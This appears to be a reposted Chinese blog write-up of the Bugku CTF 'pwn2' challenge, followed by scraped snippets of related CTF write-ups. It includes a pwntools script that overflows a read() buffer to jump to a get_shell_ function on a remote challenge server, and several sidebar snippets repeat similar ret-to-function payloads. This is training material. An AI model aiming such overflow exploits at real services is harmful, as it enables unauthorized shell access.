bugke pwn2

最新推荐文章于 2021-05-01 23:10:53 发布
最新推荐文章于 2021-05-01 23:10:53 发布
阅读量295 收藏
点赞数
原文链接:http://www.cnblogs.com/haozhizhi/p/10982400.html
版权

根据伪代码可以看到read函数存在溢出

存在一个后面 那就直接覆盖返回地址就完事了

从ida很直观看出s的偏移为0x30

所以到到返回地址的距离就是0x30+0x8

 

from pwn import *
#p = process('./pwn2')
p=remote('114.116.54.89','10003')
elf = ELF('./pwn2')
flag = elf.symbols['get_shell_']
payload = 'a'*(0x8+0x30)+p64(flag)
p.recvline()
p.sendline(payload)
p.interactive()

转载于:https://www.cnblogs.com/haozhizhi/p/10982400.html

weixin_33858336
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BugkuCTF-PWN题pwn2-overflow超详细讲解
am_03的博客
08-30 2020
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
Bugke CTF-Crypto ok
weixin_44023403的博客
05-06 435
Bugke CTF-Crypto ok知识积累解题 知识积累 Ook!加密 语法规则 OOK!只有三个不同的语法元素: Ook。 OOK? OOK! 它们组合成两个组,各种组合组合指定命令。因此,节目必须包含偶数个“Ook”,这种就是ook密码。 解题 打开下载的文件,如下; 发现是Ook编码,直接放到在线解码的网站,进行解码; 在线工具: ...
[Bugku CTF——Pwn] pwn2
Y_peak的博客
03-22 286
[Bugku CTF——Pwn] pwn2 题目地址:https://ctf.bugku.com/ 额,好久不写这么简单的题目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 exploit from pwn import * p = remote('114.67.246.176',11431) get_shell = 0x0000000000400751 payload = 'a' * (0x30 + 8) + p64(get_shell) p.send(payload) p.inter
BugKu - pwn2
Casuall的博客
07-06 3665
这道题来自于bugku旧平台的第二道pwn题,还是比较简单的,一个典型的缓冲区溢出题。 首先查看一下文件类型,file pwn2,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。 可以看到这个程序的逻辑比较简单,有一个read函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。 然后查看字符串,看看是否有内置...
[WP]BugkuCtf - pwn2
XiaoYan8023的博客
04-27 326
1.首先运行一下该程序 2.我们权限不够于是去修改一下权限(改前,改后) (当然,这步有可能是不需要的) 3.改后我们重新运行一下(123是输入的语句) 4.拖进IDA,查看字符串,此处应该就是得到flag的地方 5.之后我们查看main函数,并没有我们刚才所看见的那句话 6.而在get_shell函数中我...
pwn07.ret2syscall例题
11-11
ret2syscall例题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
google_pwn2own
04-10
Pwn2own大赛简介】 Pwn2own(发音为“pawn to own”)是一个年度网络安全竞赛,由Trend Micro的Zero Day Initiative(ZDI)主办。该比赛旨在揭示并解决浏览器和其他常用软件中的安全漏洞。参赛者通常会尝试利用...
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
ret2libc2pwn 入门题
02-11
pwn 入门题
BugkuCtf-pwn2-exp
weixin_30340745的博客
08-22 377
#!/usr/bin/env python from pwn import * p = process('./pwn2') payload = 'a' * 56 + p64(0x400751) p.recvuntil('?') p.sendline(payload) print p.recvall() 转载于:https://www.cnblo...
[pwn]bugku pwn2
qq_18823653的博客
03-26 5466
首先检查了一下保护机制,发现几乎啥保护都没有,ida查看一下 read()函数存在溢出,然后又看了一下发现main函数下面有一个get_shell_函数,点进去看了看应该是让返回地址覆盖成getshell地址, gdb看一下偏移rbp前四位为bAA1,算一下偏移 到rbp偏移为48,向上8字节是父函数rbp,所以偏移56覆盖到返回地址,get_shell_地址为 exp如下: from pwn ...
Writeup bugku刷题 pwn2
Migraine‘s Blog
05-13 2340
概述:bugku新出的pwn题,练一练手 关键字:栈溢出 x64 网址:https://ctf.bugku.com/challenges 分析一下代码,发现非常明显是x64下的栈溢出。 Pwntools生成shellcode >>> from pwn import * >>> context(os='linux...
bugku pwn2学习心得以及wp
欢迎来到神林的博客
08-25 600
拿到题目: file查看一下文件类型,可以看到 x86-64,以及 dynamically linked,所以 64位,动态连接的。 查看一下有没有开什么保护机制: 嘛都没开,直接放到64位IDA里面看一看。 看到敏感名称函数“getshell” 感觉能直接拿flag,方法就是找到一个地方跳转到getshell函数地址,查看一下地址为:0x400715 转手看main函数: 其中有一个re...
bugku ctf 实战2-注入
qq_42777804的博客
08-08 2701
     进去之后发现       wtf!?     这个怎么可以注入  !?????? 经过不断的点击发现     有注入点  哈哈哈哈哈 这样就简单了  按正常步骤来      正常的数字型注入   利用联合查询   http://www.kabelindo.co.id/readnews.php?id=24%20and%201=2%20union%20s...
bugkuCTF——猫片(安恒)
热门推荐
灬彬的博客
08-07 1万+
                             bugku昨天才更新的这道题,先将文件下载下来并改后缀png, 通常做图片隐写的题,大概都是先右键查看属性,看下有没有一些特殊的信息,没有就放binwalk看下有没有隐藏什么文件,又或者直接stegsolve分析一波,这题一开始我都试了一遍,无果。但是总不能就这样放弃吧,应该还是漏了点东西。然后折腾了快一个小时,好像有点发现, ...
bugkuCTF平台逆向题第二道Easy_Re题解
iqiqiya的博客
12-27 1万+
题目链接: http://123.206.31.85/files/1b62f97dce25f61c3a43ee953e7467c6/re1.exe tips: 下载后打开 查壳 无壳 OD载入直接搜索智能字符串就可以看到flag IDA载入 将这两处转为字符即可 但发现flag是逆序的 反过来就好    最后验证下
Bugku -分析-合集
多崎巡礼的博客
11-19 1万+
一、flag被盗 http筛选 选中一个post包,追踪tcp数据流 得到flag
Bugke CTF-Crypto 聪明的小羊
weixin_44023403的博客
05-01 379
Bugke CTF-Crypto 聪明的小羊知识积累解题 知识积累 栅栏密码: 把要加密的明文分成N个一组,然后把每组的第1个字连起来,将下面一行字母排在上面一行的后边,从而形成一段密码。当每个组里有N个元素的话就叫N栏栅栏密码。 例如密文:TEOGSDYUTAENNHLNETAMSHVAED,加密成2栏栅栏。 解密过程:先将密文分为两行 T E O G S D Y U T A E N N   H L N E T A M S H V A E D 再按上下上下的顺序组合成一句话 THE LONGEST D
ctfshow的pwn2
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值